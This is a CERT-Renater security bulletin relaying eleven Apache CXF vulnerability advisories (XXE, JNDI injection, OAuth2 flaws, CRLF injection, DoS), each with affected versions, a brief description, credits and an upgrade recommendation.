Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2026/VULN624 _____________________________________________________________________ DATE : 12/06/2026 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Apache CXF versions 4.2.2, 4.1.7. ===================================================================== https://lists.apache.org/thread/j2rypk0cvpo7w1282lopkc55qs6nwh06 https://lists.apache.org/thread/ny622fjco9csybhmjwfgwmpl385hbpxd https://lists.apache.org/thread/7hl8kgo2c4htykbsv4onmsj1c91wg0pg https://lists.apache.org/thread/dfc9fzc3zmhk1kgyxqcf3vkgxl4lpr90 https://lists.apache.org/thread/bf9w75mvw499pqlw1lsgcoq74wfrbyly https://lists.apache.org/thread/ocv1s2xymgqr3x4xyb9xyyprlzgkmf85 https://lists.apache.org/thread/fdk6t2ygpvdqfocfzt4f48nqhqdp6w9s https://lists.apache.org/thread/x1z43st65ch7pw3ok6fw8rvcklykppgl https://lists.apache.org/thread/xl3pkgobn8fd1cx78nlk60qqo1z1d468 https://lists.apache.org/thread/vfwfw7ky0z0pb0l3dtxf1g9d36j1pxgd https://lists.apache.org/thread/jyw8opqthpb419vvq9bgp1ccfm0771dc _____________________________________________________________________ CVE-2026-49875: Apache CXF: XML External Entity (XXE) Injection in W3CMultiSchemaFactory and EndpointReferenceUtils Severity: important Affected versions: - Apache CXF (org.apache.cxf:cxf-core) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-core) before 4.1.7 Description: Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. Credit: Venkatraman Kumar (r3dw0lfsec), Securin (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-49875 _____________________________________________________________________ CVE-2026-50627: Apache CXF: OAuth2: Missing JWT Audience and Issuer Validation in Access Token Validator Severity: important Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: The JwtAccessTokenValidator class in Apache CXF fails to validate the 'aud' (Audience) claims of incoming JWT access tokens. This allows a JWT issued for one Resource Server to be successfully replayed against a completely different Resource Server, leading to Token Confusion/Routing attacks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50627 _____________________________________________________________________ CVE-2026-50628: Apache CXF: OAuth2: Inverted IP Binding Check Defeats Security Control Severity: important Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: A logic error in OAuthRequestFilter rejects legitimate requests originating from the bound IP address, while blindly allowing requests from any other IP address. Enabling this security feature inadvertently creates an inverse security check. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50628 _____________________________________________________________________ CVE-2026-50633: Apache CXF: JNDI Injection vulnerability in DispatchMDBMessageListenerImpl Severity: important Affected versions: - Apache CXF (org.apache.cxf:cxf-integration-jca) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-integration-jca) before 4.1.7 Description: A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Venkatraman Kumar (r3dw0lfsec), Securin (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50633 _____________________________________________________________________ CVE-2026-50634: Apache CXF: WS JSON request filter trusts metadata from an unvalidated first signature entry Severity: important Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-jose-jaxrs) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-jose-jaxrs) before 4.1.7 Description: A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be exploited to cause CXF to process metadata that was not authenticated by the accepted signature. This can bypass the application's assumption that accepted `Content-Type` or protected HTTP-header metadata came from a verified signature entry, and may steer downstream JAX-RS entity parsing or signed-header consistency checks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. Credit: Mitchell Benjamin / Revamp Studio. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50634 _____________________________________________________________________ CVE-2026-50632: Apache CXF: JNDI Injection Vulnerability in JMSConfigFactory Severity: moderate Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-transports-jms) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-transports-jms) before 4.1.7 Description: A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Venkatraman Kumar (r3dw0lfsec), Securin (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50632 _____________________________________________________________________ CVE-2026-50623: Apache CXF: Authentication Bypass in OAuth2 TokenIntrospectionService Severity: moderate Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: An authentication bypass vulnerability exists in the OAuth2 TokenIntrospectionService in Apache CXF. Due to a missing 'throw' keyword in the security context check, the introspection endpoint (/services/oauth2/introspect) can be accessed by any unauthenticated network attacker. However note that this is a safeguard only in the case that someone forgot to enable authentication on the service. Users are recommended to upgrade to version 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50623 _____________________________________________________________________ CVE-2026-50629: Apache CXF: OAuth2: Log Injection via Unsanitized Client Identifier Severity: low Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: The 'clientId' parameter from incoming HTTP requests is directly concatenated into OAuth2 server log warning messages without sanitizing control characters. This allows an attacker to inject arbitrary content, including fake log entries, into the server's log files. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50629 _____________________________________________________________________ CVE-2026-50630: Apache CXF: OAuth2: HTTP Response Splitting via WWW-Authenticate Realm Injection Severity: low Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: A CRLF injection vulnerability exists in the OAuth2 AuthorizationUtils class. When constructing the WWW-Authenticate response header, the 'realm' parameter is concatenated without sanitizing Carriage Return (CR) and Line Feed (LF) characters. If an attacker can control the realm value, they can inject arbitrary HTTP headers or split the HTTP response entirely. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50630 _____________________________________________________________________ CVE-2026-50631: Apache CXF: OAuth2: TOCTOU Race Condition in Refresh Token Processing Severity: low Affected versions: - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7 Description: A race condition in AbstractOAuthDataProvider allows concurrent requests using the same Refresh Token to bypass single-use semantics and generate multiple valid Access Tokens, when 'recycleRefreshTokens' is set to false. A leaked refresh token can be replayed concurrently by multiple attackers or threads. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. Credit: Guanping Zhang reported this vulnerability. (finder) References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50631 _____________________________________________________________________ CVE-2026-50645: Apache CXF: No restriction on attachment headers per message Severity: low Affected versions: - Apache CXF (org.apache.cxf:cxf-core) 4.2.0 before 4.2.2 - Apache CXF (org.apache.cxf:cxf-core) before 4.1.7 Description: There is no restriction on the amount of attachment headers that a message can contain when being deserialized by Apache CXF, which can lead to uncontrolled resource consumption or a denial of service attack. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue by imposing a maximum default of 500 attachments per message. References: https://cxf.apache.org/ https://www.cve.org/CVERecord?id=CVE-2026-50645 ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================